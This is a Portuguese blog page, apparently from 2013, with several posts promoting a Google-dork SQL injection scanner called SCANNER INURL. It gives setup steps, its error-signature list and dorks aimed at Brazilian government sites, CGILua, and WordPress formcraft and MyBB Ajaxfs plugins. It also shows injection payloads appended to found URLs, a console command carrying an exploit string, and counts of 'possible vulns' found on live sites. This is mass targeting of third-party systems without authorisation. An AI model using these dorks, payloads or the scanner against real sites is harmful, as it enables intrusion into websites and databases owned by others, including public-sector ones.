Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador SCANNER INURL. Mostrar todas as postagens
Mostrando postagens com marcador SCANNER INURL. Mostrar todas as postagens

quarta-feira, 18 de dezembro de 2013

Tutorial SCANNER INURLBR 1.0 / INTERFACE

======[SCANNER INURLBR 1.0 / INTERFACE]=======

Tutorial SCANNER INURLBR 1.0 / INTERFACE


Scanner INURLBR utiliza o motor de 
Busca Google para achar seus alvos.
---------------------------------------------------------------------------------------------

BUSCA POSSÍVEIS VULNERABILIDADES
SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL)
OU ERROS DE PROGRAMAÇÃO.
OPÇÕES PARA SETAR PROXY.
MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
SETAR EXPLOIT e PERSONALIZA-LO.
PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
---------------------------------------------------------------------------------------------
VÍDEO:



Baixar SCRIPT INURLBR INTERFACE:
https://code.google.com/p/scanner-inurl/

Baixar servidor web xampp:
http://sourceforge.net/projects/xampp/ 
No caso já tenho o servidor web.

Depois do servidor instalado & já iniciado.
Cole seu script INURL na seguinte pasta.

PASTA=> C:\xampp\htdocs\
Coloque o nome do seu script como bot.php
---------------------------------------------------------------------------------------------

Abrindo o scanner...
Quando o arquivo é iniciado no navegador o mesmo
imprime "SEM ACESSO!".

Pois temos uma sec simples.

<CODE>
if (isset($_GET['senha']) && $_GET['senha'] == 'googleinurl') {
    $_SESSION['valida'] = 1; //SETANDO O VALIDADOR DA PAGINA
}
</CODE>

Assim fica o acesso:

URL: http://localhost/bot.php?senha=googleinurl

---------------------------------------------------------------------------------------------


Agora vamos efetuar uma pesquisa simples.
Configuração:

 -*DORK...: O QUE VAI SER BUSCADO||Operadores avançados do Google.

 - PROXY + PORTA..: Caso seja bloquiado pelo Google use um proxy.

 - HOST GOOGLE..: Escolha entre 202 Domínios do google para efetuar
 sua busca.

 - *ARQUIVO SAÍDA.:ONDE VAI SER SALVO SEUS RESULTADOS DE BUSCA.

 - 0xEXPL01T.: PARÂMETRO QUE DEVE SER INJETADO A CADA URL, NO FINAL
 DAS URL'S ENCONTRADAS.
 Assim pode ser injetado uma string que gere erros ou manipulem o servidor.

 - *BUSCAR ERROS: [ PADRÃO ] /  (x)[ PERSONALIZADO ]
 VOU EXPLICAR O PERSONALIZADO  PRIMEIRO.

 - ACHAR ERRO.:É usado junto com a opção *BUSCAR ERROS: PERSONALIZADO.
 Pois foge do padrão de erros SQLI ou ERROS de programação ja configurados
 no script.
 Digamos que você deseja encontrar sites do governo que tenha a frase
 "Municipal".
 Usamos uma dork
 DORK=> site:.rj.gov.br  / Vai listar todos sites do governos Rio de Janeiro.
 ACHAR ERRO.:Municipal  / Vai procurar a palavra "Municipal" dentro das url's
 encontradas com a Dork acima.
 VAMOS LÁ.....
 AGORA VAMOS AGUARDAR....
 Depois de alguns minutos....
 O Scanner valida todo o html da url.
 agora vamos para busca de erros padrão do script.
---------------------------------------------------------------------------------------------

 - *BUSCAR ERROS: (x)[ PADRÃO ] /  [ PERSONALIZADO ]
 PADRÃO  Busca erros no modo padrão é buscar erros SQLI + Erros de programação.
 Vamos ver quais são os erros padrões do script.
 Pode ou não ser junto com exploit isso vai depender de sua dork.
 Algumas dorks já forçam o buscador a listar sites com erros.
 Em outras situações usamos o exploit para gerar o erro desejado.
 
<CODE>
#ERROS MYSQL
$erro['MYSQL-01'] = 'mysql_';
$erro['MYSQL-02'] = 'You have an error in your SQL syntax;';
$erro['MYSQL-03'] = 'Warning: mysql_';
$erro['MYSQL-04'] = 'function.mysql';
$erro['MYSQL-05'] = 'MySQL result index';
$erro['MYSQL-06'] = 'syntax;';
$erro['MYSQL-07'] = 'MySQL';
#ERROS MICROSOFT
$erro['MICROSOFT-01'] = 'Microsoft JET Database';
$erro['MICROSOFT-02'] = 'ODBC Microsoft Access Driver';
$erro['MICROSOFT-03'] = '500 - Internal server error';
$erro['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
$erro['MICROSOFT-05'] = 'Unclosed quotes';
$erro['MICROSOFT-06'] = 'ADODB.Command';
$erro['MICROSOFT-07'] = 'ADODB.Field error';
$erro['MICROSOFT-08'] = 'Microsoft VBScript';
#ERROS ORACLE
$erro['ORACLE-01'] = 'Microsoft OLE DB Provider for Oracle';
$erro['ORACLE-02'] = 'ORA-';
#ERROS POSTGRESQL
$erro['POSTGRESQL-01'] = 'pg_';
$erro['POSTGRESQL-02'] = 'Warning: pg_';
$erro['POSTGRESQL-03'] = 'PostgreSql Error:';
#ERROS PHP
$erro['ERROPHP-01'] = 'Warning: include';
$erro['ERROPHP-02'] = 'Fatal error: include';
$erro['ERROPHP-03'] = 'Warning: require';
$erro['ERROPHP-04'] = 'Fatal error: require';
$erro['ERROPHP-05'] = 'ADODB_Exception';
#ERROS ASP
$erro['ERROASP-01'] = 'Version Information: Microsoft .NET Framework';
$erro['ERROASP-02'] = "Server.Execute Error";
#ERROS INDEFINIDOS
$erro['INDEFINIDO-01'] = 'SQL';
$erro['INDEFINIDO-02'] = 'Fatal error';
$erro['INDEFINIDO-03'] = 'Warning';
</CODE>
---------------------------------------------------------------------------------------------
AGORA VAMOS USAR O MODO SIMPLES COM EXPLOIT PADRÃO SQLI.

Exemplo de uso

DORK[0]=> inurl:cgi/cgilua.exe/sys/start.htm?sid=1

Com essa dork ele vai buscar na url cgi/cgilua.exe/sys/start.htm?sid=1[SEU EXPLOIT]
E injetar o exploit no final de cada resultado.
Ficamdo da seguinte forma:

http://www.site01.com.br/pasta/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.site02.com.br/cgi/cgilua.exe/sys/start.htm?sid=5'0x272D2D3B
http://site03.gov.br/pasta1/pasta2/cgi/cgilua.exe/sys/start.htm?sid=2'0x272D2D3B

O script vai executar internamente as urls encontradas + Exploits.
Achando algum erro padrão dentro do html da pagina é logo destacado como vull.

Vamos ver na pratica.. ? ... go go go go !
Agora vamos esperar....
Vamos testar mais uma busca....

As dorks aé.... use sua criatividade....

http://blog.inurl.com.br/2013/12/usando-sncanner-inurl-para-achar-falhas.html

domingo, 15 de dezembro de 2013

Wordpress formcraft Plugin Sql Injection Mais SCANNER INURL

Wordpress formcraft Plugin Sql Injection


#################################################################################
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Testado: Windows , Linux
#################################################################################
# Tipo Exploit : Sql Injection
#
# Local: [alvo]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Injeção de exploit: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################

Usando o  SCANNER INURL 1.0 - INTERFACE para capturar URL's com esse tipo de falha.
Down: https://code.google.com/p/scanner-inurl/


CONFIGURAÇÃO
Wordpress formcraft Plugin Sql Injection SCANNER INURL
RESULTADO
Wordpress formcraft Plugin Sql Injection SCANNER INURL RESULTADO

TOTAL DE URL's: 78

EXPLOIT USADO:

DORK: inurl:/wp-content/plugins/formcraft/form.php?id=

TIPO DE ERRO: PERSONALIZADO

PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=

TOTAL DE POSSÍVEIS VULL: 47

ARQUIVO COM RESULTADO: resultados.txt

terça-feira, 10 de dezembro de 2013

Usando SNCANNER INURL para achar falhas em aplicações CGILua

Exploitando CGILua
Usando SNCANNER INURL para achar falhas em aplicações CGILua

O CGILua' é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.

EXPLOIT USADO: '0x272D2D3B

DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"


Usando SCANNER INURL para achar possíveis falhas:

TOTAL DE URL's: 75

TOTAL DE POSSÍVEIS VULL: 18

ARQUIVO COM RESULTADO: resultados.txt

http://blog.inurl.com.br/2013/09/cgilua-321-cgi-exploit.html

Scanner INURL:
https://code.google.com/p/scanner-inurl/

sexta-feira, 29 de novembro de 2013

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL.
Scanner INURL utiliza motor de busca Google para achar seus alvos.

O projeto SCANNER INURL com interface web será descontinuado.
Assim dando mais foco ao Scanner em linha de comando.

BUSCA POSSÍVEIS VULNERABILIDADES

SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.

OPÇÕES PARA SETAR PROXY.

MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.

SETAR EXPLOIT.

PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.

GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.

Repositório:
https://code.google.com/p/scanner-inurl/

quarta-feira, 27 de novembro de 2013

Usando SCANNER INURL para encontrar falhas / Mybb Ajaxfs Plugin Sql Injection vulnerability.

Usando o [ SCANNER INURL 1.0 CONSOLE ], para encontrar erros "Mybb Ajaxfs Plugin Sql Injection vulnerability".

MyBB (MyBulletinBoard) é um software de sistema de fóruns (bulletin board system) desenvolvido pelo grupo MyBB, é escrito utilizando as linguagens PHP e MySQL, está licenciado como um software livre sob uma GNU Lesser General Public License.

Para explorar a falha no plugin Ajaxfs devemos efetuar uma busca, mas vamos usar
SCANNER INURL CONSOLE.

Download SCANNER INURL CONSOLE:
https://code.google.com/p/scanner-inurl/

Dork[1]::: inurl:ajaxfs.php?tooltip=
Dork[2]::: inurl:ajaxfs.php
Dork[3]::: inurl:/ajaxfs ext:php 

Entenda a falha:
http://pastebin.com/XyDrh5SG

Configurando para o scan.
Comando:
php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"

php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"


Executando

Executando SCANNER INURL